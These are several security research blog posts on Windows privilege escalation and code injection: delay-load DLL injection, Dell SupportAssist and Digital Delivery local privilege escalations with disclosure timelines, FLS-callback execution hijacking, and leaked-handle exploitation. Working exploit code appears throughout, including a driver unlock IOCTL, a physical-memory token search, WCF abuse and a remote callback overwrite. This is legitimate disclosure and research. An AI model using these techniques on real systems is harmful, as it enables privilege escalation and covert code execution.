When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer.

The code for this is pretty simple:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost.

Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby β€œtricking” the helper function into once again loading that descriptor’s DLL.

In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.

Conclusions

I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none where able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls:

1
2
3
4
5
6
7
8
OpenProcess(..);

ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table 
ReadRemoteProcess(..); // read delay entry 1...n

VirtualProtectEx(..);
WriteRemoteProcess(..);

That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

Dell SupportAssist Driver - Local Privilege Escalation

18 May 2018 at 04:00

This post details a local privilege escalation (LPE) vulnerability I found in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by the tool, and is pretty similar to bugs found by ReWolf in ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2]. These bugs are pretty interesting because they can be used to bypass driver signature enforcement (DSE) ad infinitum, or at least until they’re no longer compatible with newer operating systems.

Dell’s SupportAssist is, according to the site, β€œ(..) now preinstalled on most of all new Dell devices running Windows operating system (..)”. It’s primary purpose is to troubleshoot issues and provide support capabilities both to the user and to Dell. There’s quite a lot of functionality in this software itself, which I spent quite a bit of time reversing and may blog about at a later date.

Bug

Calling this a β€œbug” is really a misnomer; the driver exposes this functionality eagerly. It actually exposes a lot of functionality, much like some of the previously mentioned drivers. It provides capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.

The driver is first loaded when the SupportAssist tool is launched, and the filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally, this driver isn’t actually even built by Dell, but rather another company, PC-Doctor[3]. This company provides β€œsystem health solutions” to a variety of companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s highly likely that this driver can be found in a variety of other products…

Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30. I found a DLL used by the userland agent that served as an interface to the kernel driver and conveniently had symbol names available, allowing me to extract the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
// 0x222004 = driver activation ioctl
// 0x222314 = IoDriver::writePortData
// 0x22230c = IoDriver::writePortData
// 0x222304 = IoDriver::writePortData
// 0x222300 = IoDriver::readPortData
// 0x222308 = IoDriver::readPortData
// 0x222310 = IoDriver::readPortData
// 0x222700 = EcDriver::readData
// 0x222704 = EcDriver::writeData
// 0x222080 = MemDriver::getPhysicalAddress
// 0x222084 = MemDriver::readPhysicalMemory
// 0x222088 = MemDriver::writePhysicalMemory
// 0x222180 = Msr::readMsr
// 0x222184 = Msr::writeMsr
// 0x222104 = PciDriver::readConfigSpace
// 0x222108 = PciDriver::writeConfigSpace
// 0x222110 = PciDriver::?
// 0x22210c = PciDriver::?
// 0x222380 = Port1394::doesControllerExist
// 0x222384 = Port1394::getControllerConfigRom
// 0x22238c = Port1394::getGenerationCount
// 0x222388 = Port1394::forceBusReset
// 0x222680 = SmbusDriver::genericRead
// 0x222318 = SystemDriver::readCmos8
// 0x22231c = SystemDriver::writeCmos8
// 0x222600 = SystemDriver::getDevicePdo
// 0x222604 = SystemDriver::getIntelFreqClockCounts
// 0x222608 = SystemDriver::getAcpiThermalZoneInfo

Immediately the MemDriver class jumps out. After some reversing, it appeared that these functions do exactly as expected: allow userland services to both read and write arbitrary physical addresses. There are a few quirks, however.

To start, the driver must first be β€œunlocked” in order for it to begin processing control codes. It’s unclear to me if this is some sort of hacky event trigger or whether the kernel developers truly believed this would inhibit malicious access. Either way, it’s goofy. To unlock the driver, a simple ioctl with the proper code must be sent. Once received, the driver will process control codes for the lifetime of the system.

To unlock the driver, we just execute the following:

1
2
3
4
5
6
7
8
BOOL bResult;
DWORD dwRet;
SIZE_T code = 0xA1B2C3D4, outBuf;

bResult = DeviceIoControl(hDriver, 0x222004, 
                          &code, sizeof(SIZE_T), 
                          &outBuf, sizeof(SIZE_T), 
                          &dwRet, NULL);

Once the driver receives this control code and validates the received code (0xA1B2C3D4), it sets a global flag and begins accepting all other control codes.

Exploitation

From here, we could exploit this the same way rewolf did [4]: read out physical memory looking for process pool tags, then traverse these until we identify our process as well as a SYSTEM process, then steal the token. However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges[5] using the writePhysicalMemory ioctl.

Here’s how the getPhysicalAddress function works:

1
2
3
4
5
6
7
8
v5 = IoAllocateMdl(**(PVOID **)(a1 + 0x18), 1u, 0, 0, 0i64);
v6 = v5;
if ( !v5 )
  return 0xC0000001i64;
MmProbeAndLockPages(v5, 1, 0);
**(_QWORD **)(v3 + 0x18) = v4 & 0xFFF | ((_QWORD)v6[1].Next << 0xC);
MmUnlockPages(v6);
IoFreeMdl(v6);

Keen observers will spot the problem here; the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to resolve any kernel mode VAs, only usermode addresses.

We can still read chunks of physical memory unabated, however, as the readPhysicalMemory function is quite simple:

1
2
3
4
5
if ( !DoWrite )
{
  memmove(a1, a2, a3);
  return 1;
}

They reuse a single function for reading and writing physical memory; we’ll return to that. I decided to take a different approach than rewolf for a number of reasons with great results.

Instead, I wanted to toggle on SeDebugPrivilege for my current process token. This would require finding the token in memory and writing a few bytes at a field offset. To do this, I used readPhysicalMemory to read chunks of memory of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In a user token, this will be the string User32. Once we’ve identified this, we double check that we’ve found a token by validating the TokenLuid, which we can obtain from userland using the GetTokenInformation API.

In order to speed up the memory search, I only iterate over the addresses that match the token’s virtual address byte index. Essentially, when you convert a virtual address to a physical address (PA) the byte index, or the lower 12 bits, do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060. Translating this to a physical address then:

1
2
3
4
5
6
7
8
kd> !pte  fffff8a001cc2060
                                           VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88    PPE at FFFFF6FB7DBF1400    PDE at FFFFF6FB7E280070    PTE at FFFFF6FC5000E610
contains 000000007AC84863  contains 00000000030D4863  contains 0000000073147863  contains E6500000716FD963
pfn 7ac84     ---DA--KWEV  pfn 30d4      ---DA--KWEV  pfn 73147     ---DA--KWEV  pfn 716fd     -G-DA--KW-V

kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060

So our physical address is 0x716fd060 (if you’d like to read more about converting VA to PA, check out this great Microsoft article[6]). Notice the lower 12 bits remain the same between VA/PA. The search loop then boiled down to the following code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
        if (memcmp((DWORD)lpMemBuf + i, "User32 ", 8) == 0){
            
            if (TokenId <= 0x0)
                FetchTokenId();

            if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }

    HeapFree(GetProcessHeap(), 0, lpMemBuf);

    if (hTokenAddr > 0x0)
        break;
}

Once we identify the PA of our token, we trigger two separate writes at offset 0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This sometimes requires a few runs to get right (due to mapping, which I was too lazy to work out), but is very stable.

You can find the source code for the bug here.

Timeline

04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)

References

[0] http://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist [1] http://blog.rewolf.pl/blog/?p=1630 [2] https://www.exploit-db.com/exploits/39785/ [3] http://www.pc-doctor.com/ [4] https://github.com/rwfpl/rewolf-msi-exploit [5] https://github.com/hatRiot/token-priv [6] https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/converting-virtual-addresses-to-physical-addresses\

Dell Digital Delivery - CVE-2018-11072 - Local Privilege Escalation

22 August 2018 at 21:10

Back in March or April I began reversing a slew of Dell applications installed on a laptop I had. Many of them had privileged services or processes running and seemed to perform a lot of different complex actions. I previously disclosed a LPE in SupportAssist[0], and identified another in their Digital Delivery platform. This post will detail a Digital Delivery vulnerability and how it can be exploited. This was privately discovered and disclosed, and no known active exploits are in the wild. Dell has issued a security advisory for this issue, which can be found here[4].

I’ll have another follow-up post detailing the internals of this application and a few others to provide any future researchers with a starting point. Both applications are rather complex and expose a large attack surface. If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s a fine place to begin.

Dell’s Digital Delivery[1] is a platform for buying and installing system software. It allows users to purchase or manage software packages and reinstall them as necessary. Once again, it comes β€œ..preinstalled on most Dell systems.”[1]

Bug

The Digital Delivery service runs as SYSTEM under the name DeliveryService, which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe, is the user-facing component that allows users to view installed applications or reinstall previously purchased ones.

Communication from DeliveryTray to DeliveryService is performed via a Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with WCF, it’s essentially a standard methodology for exchanging data between two endpoints[2]. It allows a service to register a processing endpoint and expose functionality, similar to a web server with a REST API.

For those following along at home, you can find the initialization of the WCF pipe in Dell.ClientFulfillmentService.Controller.Initialize:

1
2
3
this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),
                                typeof(IClientFulfillmentPipeService),
                                "DDDService");

This invokes Dell.NamedPipe.StandupServiceHost:

1
2
3
4
5
6
7
8
9
10
11
12
13
ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
  host = new ServiceHost(classType, new Uri[]
  {
    realUri
  });
  host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
  host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

The endpoint is thus registered and listening and the AuthenticationManager singleton is responsible for handling requests. Once a request comes in, the AuthenticationManager passes this off to the AuthPipeWorker function which, among other things, performs the following authentication:

1
2
3
4
5
string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);
bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);
if (!flag2)
{
    ...

If the process on the other end of the request is backed by a signed Dell binary, the request is allowed and a connection may be established. If not, the request is denied.

I noticed that this is new behavior, added sometime between 3.1 (my original testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is aware of this as a potential attack vector. Unfortunately, this is an inadequate mitigation to sufficiently protect the endpoint. I was able to get around this by simply spawning an executable signed by Dell (DeliveryTray.exe, for example) and injecting code into it. Once code is injected, the WCF API exposed by the privileged service is accessible.

The endpoint service itself is implemented by Dell.NamedPipe, and exposes a dozen or so different functions. Those include:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ArchiveAndResetSettings
EnableEntitlements
EnableEntitlementsAsync
GetAppSetting
PingTrayApp
PollEntitlementService
RebootMachine
ReInstallEntitlement
ResumeAllOperations
SetAppSetting
SetAppState
SetEntitlementList
SetUserDownloadChoice
SetWallpaper
ShowBalloonTip
ShutDownApp
UpdateEntitlementUiState

Digital Delivery calls application install packages β€œentitlements”, so the references to installation/reinstallation are specific to those packages either available or presently installed.

One of the first functions I investigated was ReInstallEntitlement, which allows one to initiate a reinstallation process of an installed entitlement. This code performs the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private static void ReInstallEntitlementThreadStart(object reInstallArgs)
{
    PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;
    PipeServiceClient.TryWcfCall(delegate
    {
        PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);
    }, string.Concat(new object[]
    {
        "ReInstall ",
        ra.EntitlementId,
        " ",
        ra.RunAsUser.ToString()
    }));
}

This builds the arguments from the request and invokes a WCF call, which is sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments: an entitlement ID and a RunAsUser flag. These are both controlled by the caller.

On the server side, Dell.ClientFulfillmentService.Controller handles implementation of these functions, and OnReInstall handles the entitlement reinstallation process. It does a couple sanity checks, validates the package signature, and hits the InstallationManager to queue the install request. The InstallationManager has a job queue and background thread (WorkingThread) that occasionally polls for new jobs and, when it receives the install job, kicks off InstallSoftware.

Because we’re reinstalling an entitlement, the package is cached to disk and ready to be installed. I’m going to gloss over a few installation steps here because it’s frankly standard and menial.

The installation packages are located in C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first unzipped, followed by an installation of the software. In my case, I was triggering the installation of Dell Data Protection - Security Tools v1.9.1, and if you follow along in procmon, you’ll see it startup an install process:

1
2
3
"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _
Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,
SUPPRESSREBOOT=1\""

The run user for this process is determined by the controllable RunAsUser flag and, if set to False, runs as SYSTEM out of the %ProgramData% directory.

During process launch of the STSetup process, I noticed the following in procmon:

1
2
3
4
5
6
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software is not writable by any system user, but the entitlement package folders, Dell Data Protection - Security Tools in this case, is.

This allows non-privileged users to drop arbitrary files into this directory, granting us a DLL hijacking opportunity.

Exploitation

Exploiting this requires several steps:

  1. Drop a DLL under the appropriate %ProgramData% software package directory
  2. Launch a new process running an executable signed by Dell
  3. Inject C# into this process (which is running unprivileged in userland)
  4. Connect to the WCF named pipe from within the injected process
  5. Trigger ReInstallEntitlement

Steps 4 and 5 can be performed using the following:

1
2
3
4
5
6
7
8
9
10
11
PipeServiceClient client = new PipeServiceClient();
client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)
  System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

The classes used above are imported from NamedPipe.dll. Note that we’re simply choosing the first entitlement available and reinstalling it. You may need to iterate over entitlements to identify the correct package pointing to where you dropped your DLL.

I’ve provided a PoC on my Github here[3], and Dell has additionally released a security advisory, which can be found here[4].

Timeline

05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure

References

[0] http://hatriot.github.io/blog/2018/05/17/dell-supportassist-local-privilege-escalation/
[1] https://www.dell.com/learn/us/en/04/flatcontentg/dell-digital-delivery
[2] https://docs.microsoft.com/en-us/dotnet/framework/wcf/whats-wcf
[3] https://github.com/hatRiot/bugs
[4] https://www.dell.com/support/article/us/en/04/SLN313559

Code Execution via Fiber Local Storage

12 August 2019 at 21:10

While working on another research project (post to be released soon, will update here), I stumbled onto a very Hexacorn[0] inspired type of code injection technique that fit my situation perfectly. Instead of tainting the other post with its description and code, I figured I’d release a separate post describing it here.

When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is similar to everything else you’ve probably seen; we open a handle to the remote process, allocate some memory, and copy our shellcode into it. At this point we simply need to gain control over execution flow; this is where most of Hexacorn’s techniques come in handy. PROPagate via window properties, WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another great example is Windows Notification Facility via user subscription callbacks (at least in modexp’s proof of concept), though this one isn’t Hexacorns.

These strategies are also predicated on the process having certain capabilities (DDE, private clipboards, WNF subscriptions), but more importantly, most, if not all, do not work across sessions or integrity levels. This is obvious and expected and frankly quite niche, but in my situation, a requirement.

Fibers

Fibers are β€œa unit of execution that must be manually scheduled by the application”[1]. They are essentially register and stack states that can be swapped in and out at will, and reflect upon the thread in which they are executing. A single thread can be running at most a single fiber at a time, but fibers can be hot swapped during execution and their quantum user controlled.

Fibers can also create and use fiber data. A pointer to this is stored in TEB->NtTib.FiberData and is a per-thread structure. This is initially set during a call to ConvertThreadToFiber. Taking a quick look at this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void TestFiber()
{
    PVOID lpFiberData = HeapAlloc(GetProcessHeap(), 0, 0x10);
    PVOID lpFirstFiber = NULL;
    memset(lpFiberData, 0x41, 0x10);

    lpFirstFiber = ConvertThreadToFiber(lpFiberData);
    DebugBreak();
}

int main()
{
    DWORD tid = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestFiber, 0, 0, &tid);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

We need to spawn off the test in a new thread, as the main thread will always have a fiber instantiated and the call will fail. If we run this in a debugger we can inspect the data after the break:

1
2
3
4
5
6
7
8
9
0:000> ~
.  0  Id: 1674.1160 Suspend: 1 Teb: 7ffde000 Unfrozen
#  1  Id: 1674.c78 Suspend: 1 Teb: 7ffdd000 Unfrozen
0:000> dt _NT_TIB 7ffdd000 FiberData
ucrtbased!_NT_TIB
   +0x010 FiberData : 0x002ea9c0 Void
0:000> dd poi(0x002ea9c0) l5
002ea998  41414141 41414141 41414141 41414141
002ea9a8  abababab

In addition to fiber data, fibers also have access to the fiber local storage (FLS). For all intents and purposes, this is identical to thread local storage (TLS)[2]. This allows all thread fibers access to shared data via a global index. The API for this is pretty simple, and very similar to TLS. In the following sample, we’ll allocate an index and toss some values in it. Using our previous example as base:

1
2
3
4
lpFirstFiber = ConvertThreadToFiber(lpFiberData);
dwIdx = FlsAlloc(NULL);
FlsSetValue(dwIdx, lpFiberData);
DebugBreak();

A pointer to this data is stored in the thread’s TEB, and can be extracted from TEB->FlsData. From the above example, assume the returned FLS index for this data is 6:

1
2
3
4
5
6
7
8
9
0:001> ~
   0  Id: 15f0.a10 Suspend: 1 Teb: 7ffdf000 Unfrozen
.  1  Id: 15f0.c30 Suspend: 1 Teb: 7ffde000 Unfrozen
0:001> dt _TEB 7ffde000 FlsData
ntdll!_TEB
   +0xfb4 FlsData : 0x0049a008 Void
0:001> dd poi(0x0049a008+(4*8))
0049a998  41414141 41414141 41414141 41414141
0049a9a8  abababab

Note that the offset is always the index + 2.

Abusing FLS Callbacks to Obtain Execution Control

Let’s return to that FlsAlloc call from the above example. Its first parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:

1
2
3
4
An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function. 

Well isn’t that lovely. These callbacks are stored process wide in PEB->FlsCallback. Let’s try it out:

1
dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);

And fetching it (assuming again an index of 6):

1
2
3
4
5
0:001> dt _PEB 7ffd8000 FlsCallback
ucrtbased!_PEB
   +0x20c FlsCallback : 0x002d51f8 _FLS_CALLBACK_INFO
0:001> dd 0x002d51f8 + (2 * 6 * 4) l1
002d5228  41414141

What happens when we let this run to process exit?

1
2
3
4
5
6
7
8
0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???

Recall the MSDN comment about when the FLS callback is invoked: ..on fiber deletion, thread exit, and when an FLS index is freed. This means that worst case our code executes once the process exits and best case following a threads exit or call to FlsFree. It’s worth reiterating that the primary thread for each process will have a fiber instantiated already; it’s quite possible that this thread isn’t around anymore, but this doesn’t matter as the callbacks are at the process level.

Another salient point here is the first parameter to the callback function. This parameter is the value of whatever was in the indexed slot and is also stashed in ECX/RCX before invoking the callback:

1
2
3
dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, (PVOID)0x42424242);
DebugBreak();

Which, when executed:

1
2
3
4
5
6
7
(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???

Under specific circumstances, this can be quite useful.

Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the msvcrt!_freefls call used to free the FLS buffer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif

void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess) 
{
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"), 
                                                            "NtQueryInformationProcess");
    const char *payload = "\xcc\xcc\xcc\xcc";
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T sCallback = 0, sRetLen = 0;
    LPVOID lpBuf = NULL;

    //
    // allocate memory and write in our payload as one would normally do
    //

    lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);

    // now we need to fetch the remote process PEB
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
                              sizeof(PROCESS_BASIC_INFORMATION), NULL);

    // read the FlsCallback address out of it
    ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset), 
                          (LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
    sCallback += 2 * sizeof(SIZE_T);

    // we're targeting the _freefls call, so overwrite that with our payload
    // address 
    WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}

I tested this on an updated Windows 10 x64 against notepad and mspaint; on process exit, the callback is executed and we gain control over execution flow. Pretty useful in the end; more on this soon…

References

[0] http://www.hexacorn.com
[1] https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
[2] https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
[3] https://docs.microsoft.com/en-us/windows/win32/api/winnt/nc-winnt-pfls_callback_function

Exploiting Leaked Process and Thread Handles

22 August 2019 at 21:10

Over the years I’ve seen and exploited the occasional leaked handle bug. These can be particularly fun to toy with, as the handles aren’t always granted PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity. This post will address the various access rights assignable to handles and what we can do to exploit them to gain elevated code execution. I’ve chosen to focus specifically on process and thread handles as this seems to be the most common, but surely other objects can be exploited in similar manner.

As background, while this bug can occur under various circumstances, I’ve most commonly seen it manifest when some privileged process opens a handle with bInheritHandle set to true. Once this happens, any child process of this privileged process inherits the handle and all access it grants. As example, assume a SYSTEM level process does this:

1
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.

Existing bugs

There are several public bugs we can point to over the years as example and inspiration. As per usual James Forshaw has a fun one from 2016[0] in which he’s able to leak a privileged thread handle out of the secondary logon service with THREAD_ALL_ACCESS. This is the most β€œopen” of permissions, but he exploited it in a novel way that I was unaware of, at the time.

Another one from Ivan Fratric exploited[1] a leaked process handle with PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he identifies the JIT server process mapping memory into the content process. To do this, the JIT process needs a handle to it. The content process calls DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be exploited to obtain a full access handle.

A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle was obtained from a privileged process. They were able to exploit this via a dropped DLL and an APC.

Setup

In this post, I wanted to examine all possible access rights to determine which were exploitable on there own and which were not. Of those that were not, I tried to determine what concoction of privileges were necessary to make it so. I’ve tried to stay β€œrealistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.

For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess, hThread;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user process: %d\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %x\n", hProcess);

    CreateProcessAsUserA(hUserToken, 
        "VulnServiceClient.exe", 
        NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    SuspendThread(hThread);
    return 0;
}

In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.

The client is, of course, a little more involved. The only component that needs a little discussion up front is fetching the leaked handle. This can be done via NtQuerySystemInformation and does not require any special privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
